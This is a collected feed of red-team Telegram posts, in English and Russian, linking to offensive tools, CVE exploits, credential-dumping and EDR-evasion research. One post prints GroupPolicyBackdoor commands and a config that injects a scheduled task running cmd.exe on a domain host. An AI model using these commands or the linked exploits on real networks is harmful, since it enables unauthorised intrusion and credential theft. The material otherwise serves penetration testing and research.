Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - boku7/azureOutlookC2: Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook…
Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP...
👍8
This is an offline BloodHound ingestor and LDAP result parser. BOFHound allows operators to utilize BloodHound's beloved interface while maintaining full control over the LDAP queries being run and the spped at which they are executed. This leaves room for operator discretion to account for potential honeypot accounts, expensive LDAP query thresholds and other detection mechanisms designed with the traditional, automated BloodHound collectors in mind.
Tools:
🔗 https://github.com/coffeegist/bofhound
Research:
🔗 https://posts.specterops.io/bofhound-session-integration-7b88b6f18423
#c2 #bof #cobaltstrike #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - coffeegist/bofhound: Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's…
Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel - coffeegist/bofhound
🔥7👍2❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Набор инструментов для удалённого дампа паролей.
https://github.com/Slowerzs/ThievingFox/
Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/
#pentest #redteam #creds
https://github.com/Slowerzs/ThievingFox/
Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/
#pentest #redteam #creds
🔥11
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
🔥5❤2👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
Tool: https://github.com/EvanMcBroom/lsa-whisperer
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
GitHub
GitHub - EvanMcBroom/lsa-whisperer: Tools for interacting with authentication packages using their individual message protocols
Tools for interacting with authentication packages using their individual message protocols - EvanMcBroom/lsa-whisperer
👍14🔥2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-26229: Windows LPE
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
🔥7👍1
"Assembly Unleashed: A Hacker's Handbook" is a definitive resource tailored specifically for hackers and security researchers seeking to master the art of assembly programming language. Authored by seasoned practitioners in the field, this book offers a comprehensive journey into the depths of assembly, unraveling its complexities and exposing its potential for exploitation and defense.
🔗 Source:
https://redteamrecipe.com/assembly-for-hackers
#asm #syscalls #dll #apc #injection #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
ExpiredDomains.com
redteamrecipe.com is for sale! Check it out on ExpiredDomains.com
Buy redteamrecipe.com for 195 on GoDaddy via ExpiredDomains.com. This premium expired .com domain is ideal for establishing a strong online identity.
👍10🔥2❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-30088: Windows LPE
PATCHED: June 11, 2024
https://github.com/tykawaii98/CVE-2024-30088
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
PATCHED: June 11, 2024
https://github.com/tykawaii98/CVE-2024-30088
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
❤🔥7🔥1
🔐 Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation
This article explains how attackers use malware virtualization, custom virtual machines, code obfuscation, and polymorphic packers to evade detection by EDR systems, allowing Red Teams to remain undetected in secure environments.
🔗 Source:
https://blog.fox-it.com/2024/09/25/red-teaming-in-the-age-of-edr-evasion-of-endpoint-detection-through-malware-virtualisation/
#edr #evasion #virtualization #obfuscation #redteam
This article explains how attackers use malware virtualization, custom virtual machines, code obfuscation, and polymorphic packers to evade detection by EDR systems, allowing Red Teams to remain undetected in secure environments.
🔗 Source:
https://blog.fox-it.com/2024/09/25/red-teaming-in-the-age-of-edr-evasion-of-endpoint-detection-through-malware-virtualisation/
#edr #evasion #virtualization #obfuscation #redteam
👍11👎1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Эта работа заслуживает внимание! Если кратко, то механизм MS UIA позволяет читать любые текстовые значения на экране, открывать меню, закрывать окна, ну и все такое)) А раз он дает такие возможности, то этим нужно пользоваться... Как пример, PoC от @Michaelzhm:
https://github.com/CICADA8-Research/Spyndicapped
Не думаю, что на данную технику вообще есть какие-то детекты. Все подробности в блоге.
#redteam #pentest #spyware
https://github.com/CICADA8-Research/Spyndicapped
Не думаю, что на данную технику вообще есть какие-то детекты. Все подробности в блоге.
#redteam #pentest #spyware
🔥19❤1👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-43468: ConfigMgr/SCCM 2403 Unauth SQLi to RCE
PATCHED: Oct 8, 2024
Exploit: https://github.com/synacktiv/CVE-2024-43468
Blog: https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
#git #exploit #ad #rce #sccm #pentest #redteam
PATCHED: Oct 8, 2024
Exploit: https://github.com/synacktiv/CVE-2024-43468
Blog: https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
#git #exploit #ad #rce #sccm #pentest #redteam
GitHub
GitHub - synacktiv/CVE-2024-43468
Contribute to synacktiv/CVE-2024-43468 development by creating an account on GitHub.
🔥5👍2❤1
🔍 Exploring WinRM plugins for lateral movement
In this blog, the process of leveraging WinRM plugins to perform lateral movement to other systems is explored. Additionally, the use of the
🔗 Research:
https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/
🔗 Source:
https://github.com/FalconForceTeam/bof-winrm-plugin-jump
#ad #winrm #cobaltstrike #bof #redteam
In this blog, the process of leveraging WinRM plugins to perform lateral movement to other systems is explored. Additionally, the use of the
CIM_LogicFile WMI class to bypass certain tricky detections by Microsoft Defender is examined. Finally, all the logic is incorporated into a Cobalt Strike BOF.🔗 Research:
https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/
🔗 Source:
https://github.com/FalconForceTeam/bof-winrm-plugin-jump
#ad #winrm #cobaltstrike #bof #redteam
FalconForce
Exploring WinRM plugins for lateral movement - FalconForce
We explore how to leverage WinRM plugins to perform lateral movement to other systems and put all the logic in a Cobalt Strike BOF.
🔥6❤3👍3🤔1
Living Off The Tunnels a.k.a LOTTunnels Project is community driven project to document digital tunnels that can be abused by threat actors as well by insiders for data exfiltrations, persistence, shell access etc.
🔗 Source:
https://lottunnels.github.io/
#tunnels #persistence #cheatsheet #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤7
This post provides a technical analysis of a Brute Ratel C4 badger/agent, a Red Team tool. The analysis includes API hashing, memory injection, encrypted C2 communications, and the first 20 C2 commands for remote control.
🔗 Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
#analysis #brc4 #redteam #blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥13👍4❤🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
При эксплуатации уязвимостей ADCS могут возникать разные ошибки. В блоге подробно рассмотрены причины популярных ошибок, а также варианты решения этих проблем
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/
#pentest #redteam #adcs
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/
#pentest #redteam #adcs
1🔥12
Forwarded from Ralf Hacker Channel (Ralf Hacker)
NTLM релей в WinRMS, не ждали? А вот...
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
🔥11❤3👍3😁1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2025-33073: Reflective Kerberos Relay (LPE)
Blog: https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
Patched: June 10, 2025
Интересная LPE с релеем на себя... Даже CVE есть)
#lpe #ad #relay #pentest #redteam
Blog: https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
Patched: June 10, 2025
Интересная LPE с релеем на себя... Даже CVE есть)
#lpe #ad #relay #pentest #redteam
RedTeam Pentesting - Blog
A Look in the Mirror - The Reflective Kerberos Relay Attack
It is a sad truth in IT security that some vulnerabilities never quite want to die and time and time again, vulnerabilities that have long been fixed get revived and come right back at you. While researching relay attacks, the bane of Active …
❤8🔥4👍2
Introductory course on browser exploitation — not just covering individual JIT bugs, but a comprehensive dive into browser architecture, security layers, and principles of building exploit chains. The author demonstrates how to turn memory corruption into working exploits by analyzing a functional 3-stage chain for Chrome 130.
🔗 Source:
https://opzero.ru/en/press/101-chrome-exploitation-part-0-preface/
#chrome #v8 #sandbox #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤4😱4🔥1
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на
Впервые представлена на DEFCON 33
Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍5🔥4🤔1
Forwarded from Pentester`s Notes
Всем привет!
Все сталкивались с ситуациями, когда в корпоративной среде используются в качестве ядра DFS (Distributed File System). Стандартный базовый инструмент для прогулки по корпоративным ресурсам (в обычном пентесте, про redteam ничего не говорю) - smbclient.py в impacket. Соответственно при попытке перейти в DFS-директорию (когда папка физически располагается на другом файловом ресурсе) получали ошибку
Так вот, доработал его для полноценной поддержки DFS
Что умеет:
- ls помечает DFS-ссылки как [DFS]
- dfs_info <dir> показывает referral: targets + TTL
- cd <DFS-папка> (в режиме follow) сам делает переподключение к target и продолжает навигацию
- Nested DFS любой глубины (стек контекстов)
- Multi-target failover: упал target → пробуем следующий
- Health-check + auto-reconnect для кэшированных коннектов
- Корректная навигация через границы DFS-root: cd .., cd ../.., cd ../../other
- Работает и с Kerberos, и с NTLM (учётки переиспользуются)
- Кэширование подключений
OPSEC (важно):
Включение:
Мини-пример:
Реализация на уровне протокола: FSCTL_DFS_GET_REFERRALS (MS-DFSC).
https://github.com/durck/impacket
https://github.com/durck/impacket
https://github.com/durck/impacket
#impacket #smb #dfs #pentest #redteam
Все сталкивались с ситуациями, когда в корпоративной среде используются в качестве ядра DFS (Distributed File System). Стандартный базовый инструмент для прогулки по корпоративным ресурсам (в обычном пентесте, про redteam ничего не говорю) - smbclient.py в impacket. Соответственно при попытке перейти в DFS-директорию (когда папка физически располагается на другом файловом ресурсе) получали ошибку
STATUS_PATH_NOT_COVERED.Так вот, доработал его для полноценной поддержки DFS
Что умеет:
- ls помечает DFS-ссылки как [DFS]
- dfs_info <dir> показывает referral: targets + TTL
- cd <DFS-папка> (в режиме follow) сам делает переподключение к target и продолжает навигацию
- Nested DFS любой глубины (стек контекстов)
- Multi-target failover: упал target → пробуем следующий
- Health-check + auto-reconnect для кэшированных коннектов
- Корректная навигация через границы DFS-root: cd .., cd ../.., cd ../../other
- Работает и с Kerberos, и с NTLM (учётки переиспользуются)
- Кэширование подключений
OPSEC (важно):
Автоматическое подключение к другому файловому хранилицу по-умолчанию выключено — чтобы не шуметь лишний раз.
Включение:
# CLI:
-dfs-follow # (разрешить автоматический переход по DFS при cd)
# В шелле:
dfs_mode on # (включить follow-режим в интерактивной сессии)
Мини-пример:
# ls
Projects [DFS]
# dfs_info Projects
Target: \\fileserver-01\Projects$ (TTL: 300)
# dfs_mode on
# cd Projects
[*] DFS target: \\fileserver-01\Projects$
Реализация на уровне протокола: FSCTL_DFS_GET_REFERRALS (MS-DFSC).
https://github.com/durck/impacket
https://github.com/durck/impacket
https://github.com/durck/impacket
#impacket #smb #dfs #pentest #redteam
🔥8❤4👍4